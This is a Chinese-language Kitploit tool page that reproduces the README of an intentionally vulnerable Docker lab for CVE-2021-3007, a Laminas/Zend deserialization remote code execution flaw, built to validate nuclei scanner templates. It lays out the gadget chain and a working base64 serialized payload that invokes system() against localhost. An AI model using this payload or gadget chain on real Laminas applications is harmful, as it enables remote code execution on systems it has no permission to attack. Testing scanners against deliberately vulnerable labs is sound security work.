Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
cve-2021-3007-vulnerable — CVE-2021-3007 漏洞测试环境 - Laminas/Zend Framework 反序列化远程代码执行 | Kitploit
工具/GitHubGitHub/kre80r/cve-2021-3007-vulnerable
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育实验室与实践
GitHubkre80r/cve-2021-3007-vulnerable

cve-2021-3007-vulnerable

CVE-2021-3007 漏洞测试环境 - Laminas/Zend Framework 反序列化远程代码执行

查看仓库
29个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2021-3007 漏洞测试环境

Docker CVE CVSS

用于验证安全扫描器中 CVE-2021-3007 检测的故意存在漏洞的测试环境。

漏洞概述

属性值
CVE IDCVE-2021-3007
严重性严重(CVSS 9.8)
类型不安全的反序列化 → 远程代码执行
影响版本Laminas HTTP < 2.14.2, Zend Framework 3.0.0
CWECWE-502(不可信数据反序列化)

快速开始

root@kitploit:~
# Clone repository
git clone https://github.com/KrE80r/CVE-2021-3007-vulnerable
cd CVE-2021-3007-vulnerable

# Start vulnerable environment
docker-compose up -d

# Verify it's running
curl http://localhost:8080

# Test with nuclei (optional)
nuclei -t CVE-2021-3007.yaml -u http://localhost:8080

# Cleanup
docker-compose down

一键命令

root@kitploit:~
docker-compose up -d && sleep 3 && curl -s http://localhost:8080 | head -1

手动利用测试

root@kitploit:~
# Send serialized payload triggering RCE
curl -X POST http://localhost:8080/ \
  -d "data=TzoyODoiTGFtaW5hc1xIdHRwXFJlc3BvbnNlXFN0cmVhbSI6Mjp7czoxMDoiACoAY2xlYW51cCI7YjoxO3M6MTM6IgAqAHN0cmVhbU5hbWUiO086Mjg6IkxhbWluYXNcVmlld1xIZWxwZXJcR3JhdmF0YXIiOjI6e3M6NzoiACoAdmlldyI7TzozMzoiTGFtaW5hc1xWaWV3XFJlbmRlcmVyXFBocFJlbmRlcmVyIjoxOntzOjQ0OiIATGFtaW5hc1xWaWV3XFJlbmRlcmVyXFBocFJlbmRlcmVyAF9faGVscGVycyI7TzoyMToiTGFtaW5hc1xDb25maWdcQ29uZmlnIjoxOntzOjc6IgAqAGRhdGEiO2E6Mjp7czoxMDoiZXNjYXBlaHRtbCI7czo2OiJzeXN0ZW0iO3M6MTQ6ImVzY2FwZWh0bWxhdHRyIjtzOjE3OiJmaWxlX2dldF9jb250ZW50cyI7fX19czoxMzoiACoAYXR0cmlidXRlcyI7YToxOntzOjIyOiJlY2hvIG51Y2xlaUNWRTIwMjEzMDA3IjtpOjE7fX19"

# Expected: Response contains "nucleiCVE20213007" confirming RCE

技术细节

利用链

root@kitploit:~
Laminas\Http\Response\Stream::__destruct()
  └─► Laminas\View\Helper\Gravatar::__toString()
        └─► Laminas\View\Renderer\PhpRenderer::plugin()
              └─► Laminas\Config\Config::get()
                    └─► system() / file_get_contents()

存在漏洞的组件

包版本用途
laminas/laminas-http2.14.1存在漏洞的 HTTP 组件
laminas/laminas-view2.12.0利用链组件
laminas/laminas-config3.7.0利用链组件

存在漏洞的端点

应用程序通过 POST 接受序列化数据:

  • 路径:/ 或 /index.php
  • 参数:data、payload、serialized
  • 编码:Base64

环境细节

组件值
基础镜像php:8.1-apache
端口8080
容器名称cve-2021-3007-vulnerable

文件

root@kitploit:~
.
├── Dockerfile          # 容器构建配置
├── docker-compose.yml  # 编排(一键设置)
├── index.php           # 存在漏洞的 PHP 应用程序
├── LICENSE             # MIT 许可证
└── README.md           # 本文件

安全通知

警告:此环境仅为安全测试目的而故意存在漏洞。

禁止:

  • 暴露于公共网络
  • 部署到生产环境
  • 无人值守运行
  • 用于恶意目的

建议:

  • 在隔离的测试环境中使用
  • 不用时停止容器
  • 仅用于合法的安全研究

参考

  • NVD - CVE-2021-3007
  • GitHub Advisory - GHSA-xx8f-qf9f-5fgw
  • Laminas 安全发布
  • CheckPoint 研究 - FreakOut
  • Ambionics 研究

许可证

MIT 许可证 - 仅供安全研究和教育用途。


为 nuclei 模板验证而创建 | projectdiscovery/nuclei-templates

下载工具